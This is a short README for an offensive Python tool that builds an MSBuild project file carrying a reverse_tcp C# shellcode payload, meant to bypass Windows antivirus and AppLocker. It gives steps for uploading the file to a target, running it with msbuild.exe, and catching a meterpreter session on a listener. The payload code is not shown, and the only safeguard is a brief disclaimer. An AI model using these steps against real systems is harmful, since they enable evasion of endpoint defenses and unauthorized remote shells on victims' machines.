Windows AV/AppLocker bypass via msbuild.
python3 mspayload.py
Run the script to create a mspayload_nps.xml
file with the appropriated payload. (Only reverse_tcp [C# VirtualAlloc] is available at the moment.)
Upload it to the target and run C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe mspayload_nps.xml
to trigger a build. Make sure to setup your listener before running this command.
Fully compatible with meterpreter
payloads.
I'm not responsible for your actions, this is script is provided as-is, do not use for illegal purposes.
Based on trustedsec's implementation.
Code released under the MIT.